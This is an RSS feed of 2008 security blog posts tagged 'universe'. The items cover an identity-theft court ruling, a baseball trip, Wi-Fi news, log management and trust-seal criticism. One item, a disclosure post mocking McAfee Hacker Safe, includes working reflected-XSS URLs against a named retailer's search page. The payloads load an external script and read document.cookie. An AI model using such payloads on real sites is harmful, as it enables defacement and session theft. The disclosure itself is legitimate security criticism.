<?xml version="1.0" encoding="utf-8"?>
<rss xmlns:content="http://purl.org/rss/1.0/modules/content/" version="2.0">
  <channel>
    <title><![CDATA[[SecurityRatty] tag: universe]]></title>
    <link>http://securityratty.com/tag/universe</link>
    <description></description>
    <pubDate>Fri, 21 Mar 2008 05:26:20 +0000</pubDate>
    <generator>iRatty Engine</generator>
    <docs>http://blogs.law.harvard.edu/tech/rss</docs>
    <item>
      <title><![CDATA[Huh? Elected officials held accountable?]]></title>
      <link>http://securityratty.com/article/9e083b7a721e2a7294b607e981471adb</link>
      <guid>http://securityratty.com/article/9e083b7a721e2a7294b607e981471adb</guid>
      <description><![CDATA[I woke up in another universe this morning. Here in this universe, elected officials are held accountable for their mistakes that harm you. I suspect though that collecting on the courts award will be...]]></description>
      <content:encoded><![CDATA[<div > I woke up in another universe this morning. Here in this universe, elected officials are held accountable for their mistakes that harm you.<br/>I suspect though that collecting on the courts award will be another nightmare altogether. </div>
<table cellpadding="0" cellspacing="0" width="100%" style="margin: 12px 0px; font-family: arial; color: #333333; background: #ffffff; border: solid 4px #e5e5e5; width: 100%; clear: left;">
<tr>
<td valign="top">
<table cellpadding="0" cellspacing="0" width="100%" class="CM_CTB_Content_Wrap" style="margin: 0px; padding: 0px;background-color: #ffffff;">
<tr>
<td valign="top">
<table cellpadding="0" cellspacing="0" width="100%" style="border-bottom: solid 1px #dcdcdc; white-space: nowrap; margin-bottom: 8px; background-color: #eeeeee ;background-image: url(http://clipmarks.com/images/source-bg.gif); background-repeat: repeat-x; height: 24px; line-height: 24px; vertical-align: middle; padding-bottom: 4px; color: #666666; font-size: 10px;">
<tr>
<td valign="top"><a href="http://clipmarks.com/clipmark/13363943-34BB-498A-A917-56EABD121550/" title="go to this clipmark"><img src="http://content.clipmarks.com/blog_icon/cc5dd35b-332f-43b0-abf6-c61a32d8092f/13363943-34BB-498A-A917-56EABD121550/" alt="" width="19" height="19" border="0" style="vertical-align: middle; margin: 0px 4px; display: inline; border: none; float:none;" /></a>clipped from <a title="http://news.cincinnati.com/apps/pbcs.dll/article?AID=/20080927/NEWS0107/809270343" href="http://news.cincinnati.com/apps/pbcs.dll/article?AID=/20080927/NEWS0107/809270343" style="font-size: 11px;">news.cincinnati.com</a></td>
</tr>
</table>
<table cellpadding="0" cellspacing="0" width="100%" style="text-align: left; padding: 0px 8px; margin: 4px 0px 8px 0px; background: transparent; border: none;">
<tr>
<td valign="top"><!-- CLIPPED FROM: http://news.cincinnati.com/apps/pbcs.dll/article?AID=/20080927/NEWS0107/809270343 -->
<div style="margin: 4px 0px; color: #000000; font-size: 20px;">Elected officials can be sued in ID theft, court rules</div>
</td>
</tr>
</table>
<div style="height: 2px; font-size: 2px; background: #dcdcdc; border-bottom: solid 1px #f5f5f5; margin: 2px 4px;"></div>
<table cellpadding="0" cellspacing="0" width="100%" style="text-align: left; padding: 0px 8px; margin: 4px 0px 8px 0px; background: transparent; border: none;">
<tr>
<td valign="top"><!-- CLIPPED FROM: http://news.cincinnati.com/apps/pbcs.dll/article?AID=/20080927/NEWS0107/809270343 --><P>Elected officials can be sued if they place your private information online and someone uses it to steal your identity, an Ohio appeals court ruled Friday in overturning a lower court ruling.</P></td>
</tr>
</table>
</td>
</tr>
</table>
<div style="margin: 0px 6px 6px 4px;">
<table style="font-size: 11px;border-spacing: 0px;padding: 0px;" cellpadding="0" cellspacing="0" width="100%">
<tr>
<td style="background:transparent;border-width:0px;padding:0px;">&nbsp;</td>
<td align="right" style="background:transparent;border-width:0px;padding:0px;width:107px" width="107"><a href="http://clipmarks.com/share/13363943-34BB-498A-A917-56EABD121550/blog/" title="blog or email this clip"><img src="http://content8.clipmarks.com/images/c2b-foot.png" border="0" alt="blog it" width="107" height="17" style="border-width:0px;padding:0px;margin:0px;" /></a></td>
</tr>
</table>
</div>
</td>
</tr>
</table>
<BR/><MAP name="bdv_RSS_Ad_270908030346"><AREA alt="Feed Ads By BidVertiser.com" shape="poly" coords="0,0,467,0,467,45,315,45,315,59,0,59" href="http://secure.bidvertiser.com/performance/bdv_rss_rd.dbm?pid=165886&amp;bid=400950&amp;PHS=270908030346&amp;click=1" target="_blank" /><AREA alt="Feed Ads By BidVertiser.com" shape="rect" coords="315,45,467,59" href="http://www.bidvertiser.com/bdv/bidvertiser/bdv_ref.dbm?Ref_PID=165886&amp;Ref_Option=main&amp;source=90614506" target="_blank" /></MAP><P><a href="http://secure.bidvertiser.com/performance/bdv_rss_rd.dbm?pid=165886&amp;bid=400950&amp;PHS=270908030346&amp;click=1" target="_blank"><IMG src="http://bdv.bidvertiser.com/BidVertiser.dbm?pid=165886&amp;bid=400950&amp;PHS=270908030346&amp;rssimage=1&amp;rSRC=2" border="0" usemap="#bdv_RSS_Ad_270908030346" /></a></P>]]></content:encoded>
      <pubDate>Sat, 27 Sep 2008 11:03:46 +0000</pubDate>
      <category domain="http://securityratty.com/tag/officials">officials</category>
      <category domain="http://securityratty.com/tag/held accountable">held accountable</category>
      <category domain="http://securityratty.com/tag/sued">sued</category>
      <category domain="http://securityratty.com/tag/information online">information online</category>
      <category domain="http://securityratty.com/tag/courts award">courts award</category>
      <category domain="http://securityratty.com/tag/nightmare altogether">nightmare altogether</category>
      <category domain="http://securityratty.com/tag/court rules">court rules</category>
      <category domain="http://securityratty.com/tag/lower court">lower court</category>
      <category domain="http://securityratty.com/tag/universe">universe</category>
      <source url="http://spywarebiz.com/spywarebizblog/?p=631">Huh? Elected officials held accountable?</source>
    </item>
    <item>
      <title><![CDATA[Let's Play Two]]></title>
      <link>http://securityratty.com/article/83bf8d018a7d0aa80e3dc49adab30013</link>
      <guid>http://securityratty.com/article/83bf8d018a7d0aa80e3dc49adab30013</guid>
      <description><![CDATA[Every year my Dad and I go to see a Red Sox series. Last weekend was this year's trip and we went to Chicago to see the World Champion Boston Red Sox (saying that never gets old) play the White Sox....]]></description>
      <content:encoded><![CDATA[<p>Every year my Dad and I go to see a Red Sox series. Last weekend was this year&#39;s trip and we went to Chicago to see the World Champion Boston Red Sox (saying that never gets old) play the White Sox. Of course, while you are in Chicago you have to see Wrigley Field, and we really lucked out. This weekend was Red Sox versus the White Sox (the battle of the Soxes they used to call it on Channel 38) on the southside and northside featured Cubs versus Cardinals! The last four World Series winners in town on the same weekend (Red Sox 04, 07, White Sox 05, Cards 06).</p><br /><div>We learned several things- first in heaven the Cubs play the Red Sox in the World Series. Those ballparks are true gems. (In hell its probably the Yankees versus Phillies). Also, the people on the southside and northside *really* have a rivalry going. Its basically Boston v NY but they live in the same town! Here is one example from the southside</div><br /><div><a href="http://1raindrop.typepad.com/.a/6a00d83451c75869e200e553fc0c9d8834-pi" style="display: inline;"><img alt="IMG_0597" border="0" class="at-xid-6a00d83451c75869e200e553fc0c9d8834 " src="http://1raindrop.typepad.com/.a/6a00d83451c75869e200e553fc0c9d8834-800wi" title="IMG_0597" /></a>
<br /></div><br /><div>One of the great things about Wrigley (and there are many despite what southsiders say), is that its in the middle of a real neighborhood</div><div><a href="http://1raindrop.typepad.com/.a/6a00d83451c75869e200e553e0bbb38833-pi" style="display: inline;"><img alt="IMG_0486" border="0" class="at-xid-6a00d83451c75869e200e553e0bbb38833 " src="http://1raindrop.typepad.com/.a/6a00d83451c75869e200e553e0bbb38833-800wi" title="IMG_0486" /></a>
<br /></div><br /><div>Epicenter of Cub universe</div><br /><div><a href="http://1raindrop.typepad.com/.a/6a00d83451c75869e200e553e0bbf68833-pi" style="display: inline;"><img alt="IMG_0487" border="0" class="at-xid-6a00d83451c75869e200e553e0bbf68833 " src="http://1raindrop.typepad.com/.a/6a00d83451c75869e200e553e0bbf68833-800wi" title="IMG_0487" /></a>&#160;</div><br /><div>Lots of action before and after game time, lots of people wandering around with gloves catching batting practices homers outside the stadium...err Field. Key point - Wrigley is a field, not a Stadium. Also Fenway is a Park. The Greek root of the word &quot;paradise&quot;, means &quot;enclosed green space&quot;, not concreteopolis</div><br /><div><a href="http://1raindrop.typepad.com/.a/6a00d83451c75869e200e553fc0ed98834-pi" style="display: inline;"><img alt="IMG_0489" border="0" class="at-xid-6a00d83451c75869e200e553fc0ed98834 " src="http://1raindrop.typepad.com/.a/6a00d83451c75869e200e553fc0ed98834-800wi" title="IMG_0489" /></a>
<br /></div><br /><div>Wrigley is baseball Mecca</div><div><a href="http://1raindrop.typepad.com/.a/6a00d83451c75869e200e553fc15338834-pi" style="display: inline;"><img alt="IMG_0507" border="0" class="at-xid-6a00d83451c75869e200e553fc15338834 " src="http://1raindrop.typepad.com/.a/6a00d83451c75869e200e553fc15338834-800wi" title="IMG_0507" /></a>
<br /></div><br /><div><a href="http://1raindrop.typepad.com/.a/6a00d83451c75869e200e553e0bebd8833-pi" style="display: inline;"><img alt="IMG_0515" border="0" class="at-xid-6a00d83451c75869e200e553e0bebd8833 " src="http://1raindrop.typepad.com/.a/6a00d83451c75869e200e553e0bebd8833-800wi" title="IMG_0515" /></a>
<br /></div><br /><div><a href="http://1raindrop.typepad.com/.a/6a00d83451c75869e200e553e0bef48833-pi" style="display: inline;"><img alt="IMG_0533" border="0" class="at-xid-6a00d83451c75869e200e553e0bef48833 " src="http://1raindrop.typepad.com/.a/6a00d83451c75869e200e553e0bef48833-800wi" title="IMG_0533" /></a>
<br /></div><br /><div><span style="color: #0000ff; text-decoration: underline;"><br /></span></div><div>The greatest Cub of all, Ernie Banks, was our touchstone for the day - &quot;Let&#39;s Play Two.&quot; we started at Wrigley for the day game (Zambrano got shelled) and then got crosstown for the night game.</div><br /><div><a href="http://1raindrop.typepad.com/.a/6a00d83451c75869e200e553e0bce68833-pi" style="display: inline;"><img alt="IMG_0496" border="0" class="at-xid-6a00d83451c75869e200e553e0bce68833 " src="http://1raindrop.typepad.com/.a/6a00d83451c75869e200e553e0bce68833-800wi" title="IMG_0496" /></a>
<br /></div><div>To pull this off the L is your friend. As several Chicagoans pointed out, they are the only city that can have a true subway series, because the Red Line services both the White Sox and Cubs, whereas Mets-Yankees involves numerous transfers and so on.</div><br /><div><a href="http://1raindrop.typepad.com/.a/6a00d83451c75869e200e553fc0e988834-pi" style="display: inline;"><img alt="IMG_0488" border="0" class="at-xid-6a00d83451c75869e200e553fc0e988834 " src="http://1raindrop.typepad.com/.a/6a00d83451c75869e200e553fc0e988834-800wi" title="IMG_0488" /></a>
<br /></div><br /><div>We got to US Cellular Field which is fine but a shadow of Wrigley and absolutely nothing good to <a href="http://www.nytimes.com/interactive/2008/06/08/travel/20080608_BALLPARK_GRAPHIC.html">eat</a>. Luckily we had Daisuke Matsuzaka on the hill</div><br /><div><a href="http://1raindrop.typepad.com/.a/6a00d83451c75869e200e553fc187a8834-pi" style="display: inline;"><img alt="IMG_0569" border="0" class="at-xid-6a00d83451c75869e200e553fc187a8834 " src="http://1raindrop.typepad.com/.a/6a00d83451c75869e200e553fc187a8834-800wi" title="IMG_0569" /></a>
<br /></div><br /><div><a href="http://1raindrop.typepad.com/.a/6a00d83451c75869e200e553fc18a88834-pi" style="display: inline;"><img alt="IMG_0573" border="0" class="at-xid-6a00d83451c75869e200e553fc18a88834 " src="http://1raindrop.typepad.com/.a/6a00d83451c75869e200e553fc18a88834-800wi" title="IMG_0573" /></a>
<br /></div><br /><div>Before every game, Big Papi holds court in center with some players from the other team, he is to be a very popular guy. Ozzie Guillen told him before the series that with Manny gone, he wouldn&#39;t see a pitch to hit all weekend (ps. he did and crushed a bases loaded double)</div><br /><div><a href="http://1raindrop.typepad.com/.a/6a00d83451c75869e200e553e0bfa78833-pi" style="display: inline;"><img alt="IMG_0581" border="0" class="at-xid-6a00d83451c75869e200e553e0bfa78833 " src="http://1raindrop.typepad.com/.a/6a00d83451c75869e200e553e0bfa78833-800wi" title="IMG_0581" /></a>
<br /></div><br /><br /><div>The question we got most was - what about the Manny trade? His replacement strikes out a lot, but is otherwise a promising player</div><br /><div><a href="http://1raindrop.typepad.com/.a/6a00d83451c75869e200e553e0bb978833-pi" style="display: inline;"><img alt="IMG_0468" border="0" class="at-xid-6a00d83451c75869e200e553e0bb978833 " src="http://1raindrop.typepad.com/.a/6a00d83451c75869e200e553e0bb978833-800wi" title="IMG_0468" /></a>
<br /></div><br /><div>The Red Sox and White Sox share a little history, most especially Pudge Fisk who hit the famous homer in the 75 world series for the Red Sox and then had a great career for the White Sox (actually played more games for Chicago than Boston, but went into Cooperstown with a B on his hat)</div><br /><div><a href="http://1raindrop.typepad.com/.a/6a00d83451c75869e200e553e0bb778833-pi" style="display: inline;"><img alt="IMG_0456" border="0" class="at-xid-6a00d83451c75869e200e553e0bb778833 " src="http://1raindrop.typepad.com/.a/6a00d83451c75869e200e553e0bb778833-800wi" title="IMG_0456" /></a></div><div>
<br /></div><div>Red Sox won, hanging out in Wrigley was an even bigger highlight, and Chicago is a beautiful city to visit, by far the most accessible of the big US cities. Also, lots of good places to eat courtesy of <a href="http://www.matasano.com/log/">Thomas Ptacek</a>.</div><div><a href="http://1raindrop.typepad.com/.a/6a00d83451c75869e200e553e0c08f8833-pi" style="display: inline;"><img alt="IMG_0591" border="0" class="at-xid-6a00d83451c75869e200e553e0c08f8833 " src="http://1raindrop.typepad.com/.a/6a00d83451c75869e200e553e0c08f8833-800wi" title="IMG_0591" /></a>
<br /></div>]]></content:encoded>
      <pubDate>Tue, 12 Aug 2008 08:47:51 +0000</pubDate>
      <category domain="http://securityratty.com/tag/world series winners">world series winners</category>
      <category domain="http://securityratty.com/tag/world series">world series</category>
      <category domain="http://securityratty.com/tag/red sox versus">red sox versus</category>
      <category domain="http://securityratty.com/tag/red sox">red sox</category>
      <category domain="http://securityratty.com/tag/red sox series">red sox series</category>
      <category domain="http://securityratty.com/tag/series">series</category>
      <category domain="http://securityratty.com/tag/white sox">white sox</category>
      <category domain="http://securityratty.com/tag/white sox share">white sox share</category>
      <category domain="http://securityratty.com/tag/play">play</category>
      <source url="http://1raindrop.typepad.com/1_raindrop/2008/08/lets-play-two.html">Let's Play Two</source>
    </item>
    <item>
      <title><![CDATA[Wee-Fi: Hughes Ups Downstream Speeds; Eye-Fi Raises More Cash]]></title>
      <link>http://securityratty.com/article/9991c0ab78d6df5536ec92e024988c5b</link>
      <guid>http://securityratty.com/article/9991c0ab78d6df5536ec92e024988c5b</guid>
      <description><![CDATA[HughesNet now delivers 5 Mbps downstream over satellite: The network was previously limited to 3 Mbps down for a whopping $190 or $210 per month, depending on whether you paid upfront for the receiver...]]></description>
      <content:encoded><![CDATA[<p><img src="http://wifinetnews.com/images/weefi.jpg" align="right" border="0" hspace="5" /><a href="http://money.cnn.com/news/newsfeeds/articles/prnewswire/200808060800PR_NEWS_USPR_____NEW056.htm"><strong>HughesNet now delivers 5 Mbps downstream over satellite:</strong></a> The network was previously limited to 3 Mbps down for a whopping $190 or $210 per month, depending on whether you paid upfront for the receiver or not. The new service, ElitePremium (running out of superlatives, eh, HughesNet?), doesn't yet show up in <a href="http://go.gethughesnet.com/plans.cfm"><strong>their list of plans</strong></a>, and the press release declines to mention the price, which is likely to be $250 per month based on their other tiers. While that's steep, when the alternative is nothing, paying $60 for 1 Mbps to perhaps $250 Mbps for 5 Mbps downstream could be a lifeline for businesses in the boonies.</p>

<p><a href="http://biz.yahoo.com/prnews/080806/nyw045.html?.v=101"><strong>Eye-Fi raises $11m in second funding round:</strong></a> I don't cover companies' financial dealings often, but Eye-Fi is always worth highlighting, as they appear to be the only smart entrant in the entire universe of cameras-with-Wi-Fi, and they're not even a camera maker. Camera makers have typically limited or straitjacked the onboard Wi-Fi. Eye-Fi's now three models of SD cards with Wi-Fi built in have a pretty wide range of controls and abilities. I tested out the Eye-Fi Explore recently, which pairs Wi-Fi GPS-like positioning from Skyhook with Wayport hotspot access, and the review appears in Saturday's Seattle Times. Eye-Fi's biggest challenge is better camera integration, so that cameras can handle power management in discussion with the card; camera makers have to not feel threatened by Eye-Fi's smart technology, though.</p>]]></content:encoded>
      <pubDate>Wed, 06 Aug 2008 07:59:34 +0000</pubDate>
      <category domain="http://securityratty.com/tag/eye-fi">eye-fi</category>
      <category domain="http://securityratty.com/tag/eye-fi explore recently">eye-fi explore recently</category>
      <category domain="http://securityratty.com/tag/mbps downstream">mbps downstream</category>
      <category domain="http://securityratty.com/tag/eye-fi raises 11m">eye-fi raises 11m</category>
      <category domain="http://securityratty.com/tag/mbps">mbps</category>
      <category domain="http://securityratty.com/tag/wi-fi">wi-fi</category>
      <category domain="http://securityratty.com/tag/onboard wi-fi">onboard wi-fi</category>
      <category domain="http://securityratty.com/tag/camera makers">camera makers</category>
      <category domain="http://securityratty.com/tag/pairs wi-fi gps-like">pairs wi-fi gps-like</category>
      <source url="http://wifinetnews.com/archives/008412.html">Wee-Fi: Hughes Ups Downstream Speeds; Eye-Fi Raises More Cash</source>
    </item>
    <item>
      <title><![CDATA[Information Centric Security and Virtualization]]></title>
      <link>http://securityratty.com/article/3b695be0ce1152f176bb51d7e4a74157</link>
      <guid>http://securityratty.com/article/3b695be0ce1152f176bb51d7e4a74157</guid>
      <description><![CDATA[With Information Centric Security, you create a virtual container, wrapper or 'universe' for the data and the business rules. You no longer care if some of the infrastructure has been compromised as...]]></description>
      <content:encoded><![CDATA[With Information Centric Security, you create a virtual container, wrapper or 'universe' for the data and the business rules.  You no longer care if some of the infrastructure has been compromised as you may still be able to keep data secure even if it has been copied or vMotion'ed off to some other place outside your control. ]]></content:encoded>
      <pubDate>Mon, 21 Jul 2008 15:00:00 +0000</pubDate>
      <category domain="http://securityratty.com/tag/information centric security">information centric security</category>
      <category domain="http://securityratty.com/tag/data">data</category>
      <category domain="http://securityratty.com/tag/data secure">data secure</category>
      <category domain="http://securityratty.com/tag/business rules">business rules</category>
      <category domain="http://securityratty.com/tag/virtual container">virtual container</category>
      <category domain="http://securityratty.com/tag/infrastructure">infrastructure</category>
      <category domain="http://securityratty.com/tag/care">care</category>
      <category domain="http://securityratty.com/tag/vmotion">vmotion</category>
      <category domain="http://securityratty.com/tag/wrapper">wrapper</category>
      <source url="http://infocentric.typepad.com/blog/2008/07/information-centricity-and-virtualization.html">Information Centric Security and Virtualization</source>
    </item>
    <item>
      <title><![CDATA[PC Universe is shrinking thanks to McAfee Secure's cluelessness]]></title>
      <link>http://securityratty.com/article/9d21b4916ac492044bfde2858ae4d650</link>
      <guid>http://securityratty.com/article/9d21b4916ac492044bfde2858ae4d650</guid>
      <description><![CDATA[My web app sec friends know exactly how to push my red buttons. &quot;Heh-heh, send it to Russ, he'll go off.&quot; Yep. ;-) Thanks, Rafal . Now I'm all spun up. I was sent two moronic gems this morning; one on...]]></description>
      <content:encoded><![CDATA[My web app sec friends know exactly how to push my red buttons. "Heh-heh, send it to Russ, he'll go off." Yep. ;-) Thanks, <a href="http://preachsecurity.blogspot.com/">Rafal</a>. Now I'm all spun up. I was sent two moronic gems this morning; one on the merits of McAfee Secure / Hacker Safe and the <a href="http://www.internetretailer.com/dailyNews.asp?id=24742">109%</a> sales increase it resulted in for <a href="http://pcuniverse.com/">PC Universe</a>, the other an interview with the Internet's single biggest dillweed, <a href="http://www.websharedesign.com/on-the-spot-with-webshare-hackersafe-sr-director-of-business-development-cresta-pillsbury.html">Cresta Pillsbury</a>. These articles are both a bit dated, but they equally embrace the premise of "trust" logos as a predominant sales driver, rather than any actual motivation to secure a site and protect consumers. <br />
An example:<br />
<span style="font-style:italic;">"If you’re doing conversion marketing and statistical testing on your website and you haven’t explored trust logos yet, then you’re missing out."</span><br />
I must be the most naive person in the world; this enrages me. When will the idiots who write this crap get a clue? They've bought right into the hype the <a href="http://holisticinfosec.blogspot.com/2008/05/saas-snake-oil-top-ten-with-video.html">snake oil salesmen</a> hoped they would and are now complicit in their failures. <br />
Case in point, as seen in the Internet Retailer piece. By the way, I realize that Internet Retailer and basic web application security practices are completely at odds, but this one deserves direct abuse.<br />
<span style="font-style:italic;">"PC Universe first tested Hacker Safe on its own site in an A/B split test in which half the visitors saw the Hacker Safe seal and half did not. During that test, 7.3% more orders came from Hacker Safe shoppers than from the control group. PC Universe, which operates on the web at PCUniverse.com, is No. 360 in the Internet Retailer Top 500 Guide."</span><br />
Really? Let's see what McAfee Secure / Hacker Safe has done to actually provide any measurable <span style="font-weight:bold;">security</span> benefit. <br />
How about absolutely nothing.<br />
Here's PC Universe's very current, verified McAfee Hacker Safe <a href="https://www.mcafeesecure.com/RatingVerify?ref=www.pcuniverse.com">cert</a>.<br />
Now, here are a few ridiculous examples of reality from the <span style="font-style:italic;">this</span> universe as opposed to the McAfee-twisted alternate universe. Please note, this is the "accountid" variable, and the fact that the marquee is rendered no less than eight times.<br />
1) <a href="http://pcuniverse.resultspage.com/search.php?w=test&accountid=%22%3E%3Cmarquee%3E%3Ch%31%3EThis_site_is_NOT_McAfee_Secure%3C%2Fh%31%3E%3C%2Fmarquee%3E&p=Q&ts=custom&available=available%3Ainstock&image1.x=0&image1.y=0&image1=Submit+search">Marquee</a>  <br />
2) <a href="http://pcuniverse.resultspage.com/search.php?w=test&accountid=%22%3E%3Cscript%20src%3Dhttp%3A//holisticinfosec.org/js/pleasefixme.js%3E%3C/script%3E&p=Q&ts=custom&available=available%3Ainstock&image1.x=0&image1.y=0&image1=Submit+search">XSS Deface</a> <br />
3) <a href="http://pcuniverse.resultspage.com/search.php?w=test&accountid=%22%3E%3CSCRIPT%3Ealert%28document%2Ecookie%29%3C%2FSCRIPT%3E&p=Q&ts=custom&available=available%3Ainstock&image1.x=0&image1.y=0&image1=Submit+search">Cookie</a><br />
If you rather just see a video of these vulns, it's <a href="http://holisticinfosec.org/video/pcuniverse/pcuniverse.html">here</a>.<br />
PC Universe, rather than lauding your sales increases thanks to some POS logo, try securing your site code. I guarantee you have other issues.<br />
McAfee Secure, once more, you are simply fraudulent to the core.<br />
<br />
<a href="http://del.icio.us/post?url=http://holisticinfosec.blogspot.com/2008/06/pc-universe-is-shrinking-thanks-to.html&title=PC%20Universe%20is%20shrinking%20thanks%20to%20McAfee%20Secure's%20cluelessness " title="PC Universe is shrinking thanks to McAfee Secure's cluelessness ">del.icio.us</a> | <a href="http://digg.com/submit?phase=2&amp;url=http://holisticinfosec.blogspot.com/2008/06/pc-universe-is-shrinking-thanks-to.html" title="PC Universe is shrinking thanks to McAfee Secure's cluelessness ">digg</a>]]></content:encoded>
      <pubDate>Fri, 27 Jun 2008 06:11:00 +0000</pubDate>
      <category domain="http://securityratty.com/tag/internet retailer piece">internet retailer piece</category>
      <category domain="http://securityratty.com/tag/internet retailer">internet retailer</category>
      <category domain="http://securityratty.com/tag/secure">secure</category>
      <category domain="http://securityratty.com/tag/mcafee secure">mcafee secure</category>
      <category domain="http://securityratty.com/tag/universe">universe</category>
      <category domain="http://securityratty.com/tag/internet retailer top">internet retailer top</category>
      <category domain="http://securityratty.com/tag/hacker safe seal">hacker safe seal</category>
      <category domain="http://securityratty.com/tag/hacker safe">hacker safe</category>
      <category domain="http://securityratty.com/tag/hacker safe shoppers">hacker safe shoppers</category>
      <source url="http://holisticinfosec.blogspot.com/2008/06/pc-universe-is-shrinking-thanks-to.html">PC Universe is shrinking thanks to McAfee Secure's cluelessness</source>
    </item>
    <item>
      <title><![CDATA[More Log Management Questions - Answered!]]></title>
      <link>http://securityratty.com/article/ecfe354f02abfe2889064a56828eecd7</link>
      <guid>http://securityratty.com/article/ecfe354f02abfe2889064a56828eecd7</guid>
      <description><![CDATA[I did this VERY fun webcast with WhiteHatWorld this week and a lot of good questions about log management came up. I am answering them here for my readers. BTW, LogLogic product-specific questions can...]]></description>
      <content:encoded><![CDATA[<p>I did <a href="http://whitehatworld.com/may22.html">this VERY fun webcast</a> with WhiteHatWorld this week and a lot of good questions about <a href="http://www.loglogic.com">log management</a> came up. I am answering them here for my readers. BTW, <a href="http://www.loglogic.com">LogLogic</a> product-specific questions can be found on <a href="http://www.loglogic.com">LogLogic website</a>; I am not answering them here. <p>&nbsp; <p>Q1: Is a preferred log management program to consolidate the log data and then allow us to review them? <p>A1: The answer is "Yes!" for a vast majority of use cases consolidating logs work better than the silo'ed approach. Also, this will be answered in&nbsp; longer dedicated post within a few days (link TBA). <p>&nbsp; <p>Q2: Is it feasible to use a log management tool to try to determine whether application events / failures are being caused by infrastructure issues? <p>A2:Wow, fantastic! The answer&nbsp; to this is "Yes, if you have the right logs collected." In most cases,&nbsp; to get to the bottom of such issues requires having BOTH application (e.g. PeopleSoft or Oracle) and infrastructure logs (e.g. Windows or Solaris). <p>&nbsp; <p>Q3: What the typical retention schedule for logs which might be required logs for compliance issues? <p>A3: I wish I can give a simple answer for this, but there is none. Well, PCI DSS makes it simple: 1 year for logs from in-scope systems. Other regulations are not as clear and the numbers, or - more often! - guesses at such number range from 90 days to 7 years and more.&nbsp; 90 days to 1 year is a common retention policy for security (on the longer side of this range) and operationally (on the shorted side of this time range) useful logs. <a href="chuvakin.blogspot.com/2007/04/top-11-reasons-to-collect-and-preserve.html">Check this out</a> for a few ideas for long long you might need the logs. <p>&nbsp; <p>Q4: Once you have logged the events, what do you do with them?  <p>A4: Well, I was about to laugh it off since it truly opens up a Universe of questions, issues, challenges, etc. But here is my attempt at a short answer (like, less than a book :-)): a) you collect the logs and now you can search thru them in case you need to b) you summarize them and notice the trends - overall know what is going in your environment c) you analyze them in real time to trigger alerts on "critical" log messages - failures, attacks, etc.&nbsp; See <a href="http://www.slideshare.net/anton_chuvakin/what-every-organization-should-log-and-monitor">this slide deck</a> for some useful pointers. <p>&nbsp; <p>Q5: Why do I create a log policy?&nbsp; <p>A5: Log policy is a clear and simple document that show what you log on each system (and why): it helps you to configure logging across all the systems as well as helps to know what information you have in your environment (should an auditor ask, for example). A log policy also defines log retention, log review practices, etc. <a href="http://csrc.nist.gov/publications/nistpubs/800-92/SP800-92.pdf">NIST 800-92 Guide to Security Log Management&nbsp; [PDF]</a> is a good source of info on this subject. <p>Enjoy!</p> <div class="wlWriterSmartContent" id="scid:0767317B-992E-4b12-91E0-4F059A8CECA8:ed33db44-121b-4f31-bd38-5b010c412d10" style="padding-right: 0px; display: inline; padding-left: 0px; padding-bottom: 0px; margin: 0px; padding-top: 0px">Technorati tags: <a href="http://technorati.com/tags/log%20management" rel="tag">log management</a>, <a href="http://technorati.com/tags/logging" rel="tag">logging</a></div>  <div class="blogger-post-footer">About me: http://www.chuvakin.org</div><div class="feedflare">
<a href="http://feeds.feedburner.com/~f/AntonChuvakinPersonalBlog?a=p2MSNH"><img src="http://feeds.feedburner.com/~f/AntonChuvakinPersonalBlog?i=p2MSNH" border="0"></img></a> <a href="http://feeds.feedburner.com/~f/AntonChuvakinPersonalBlog?a=zSlvyH"><img src="http://feeds.feedburner.com/~f/AntonChuvakinPersonalBlog?i=zSlvyH" border="0"></img></a> <a href="http://feeds.feedburner.com/~f/AntonChuvakinPersonalBlog?a=OK4Y0H"><img src="http://feeds.feedburner.com/~f/AntonChuvakinPersonalBlog?i=OK4Y0H" border="0"></img></a>
</div><img src="http://feeds.feedburner.com/~r/AntonChuvakinPersonalBlog/~4/296896421" height="1" width="1"/>]]></content:encoded>
      <pubDate>Fri, 23 May 2008 12:04:00 +0000</pubDate>
      <category domain="http://securityratty.com/tag/log management">log management</category>
      <category domain="http://securityratty.com/tag/log">log</category>
      <category domain="http://securityratty.com/tag/defines log retention">defines log retention</category>
      <category domain="http://securityratty.com/tag/log policy">log policy</category>
      <category domain="http://securityratty.com/tag/log management tool">log management tool</category>
      <category domain="http://securityratty.com/tag/log management program">log management program</category>
      <category domain="http://securityratty.com/tag/infrastructure logs">infrastructure logs</category>
      <category domain="http://securityratty.com/tag/logs">logs</category>
      <category domain="http://securityratty.com/tag/log messages">log messages</category>
      <source url="http://feeds.feedburner.com/~r/AntonChuvakinPersonalBlog/~3/296896421/more-log-management-questions-answered.html">More Log Management Questions - Answered!</source>
    </item>
    <item>
      <title><![CDATA[Microsoft hack pack spells trouble]]></title>
      <link>http://securityratty.com/article/41169623910fc0b132d35707b4cac808</link>
      <guid>http://securityratty.com/article/41169623910fc0b132d35707b4cac808</guid>
      <description><![CDATA[Microsoft has announced a suite of tools called COFEE that makes forensic analysis of Windows easier. This means that there is a whole universe of potential exploits just waiting to be...]]></description>
      <content:encoded><![CDATA[Microsoft has announced a suite of tools called COFEE that makes forensic analysis of Windows easier. This means that there is a whole universe of potential exploits just waiting to be found.]]></content:encoded>
      <pubDate>Wed, 30 Apr 2008 20:00:00 +0000</pubDate>
      <category domain="http://securityratty.com/tag/windows easier">windows easier</category>
      <category domain="http://securityratty.com/tag/microsoft">microsoft</category>
      <category domain="http://securityratty.com/tag/forensic analysis">forensic analysis</category>
      <category domain="http://securityratty.com/tag/potential exploits">potential exploits</category>
      <category domain="http://securityratty.com/tag/tools">tools</category>
      <category domain="http://securityratty.com/tag/suite">suite</category>
      <category domain="http://securityratty.com/tag/cofee">cofee</category>
      <category domain="http://securityratty.com/tag/universe">universe</category>
      <source url="http://www.networkworld.com/columnists/2008/050108-backspin.html?fsrc=rss-security">Microsoft hack pack spells trouble</source>
    </item>
    <item>
      <title><![CDATA[Access AT&T Wi-Fi from T-Mobile Hotspots]]></title>
      <link>http://securityratty.com/article/c0437df851b9acdef894b2626e3c7b5f</link>
      <guid>http://securityratty.com/article/c0437df851b9acdef894b2626e3c7b5f</guid>
      <description><![CDATA[T-Mobile's roaming deal with AT&amp;T has obviously already kicked in: Astute reader Klaus Ernst let me know several days ago that the New York Starbucks locations were offering an AT&amp;T login on the...]]></description>
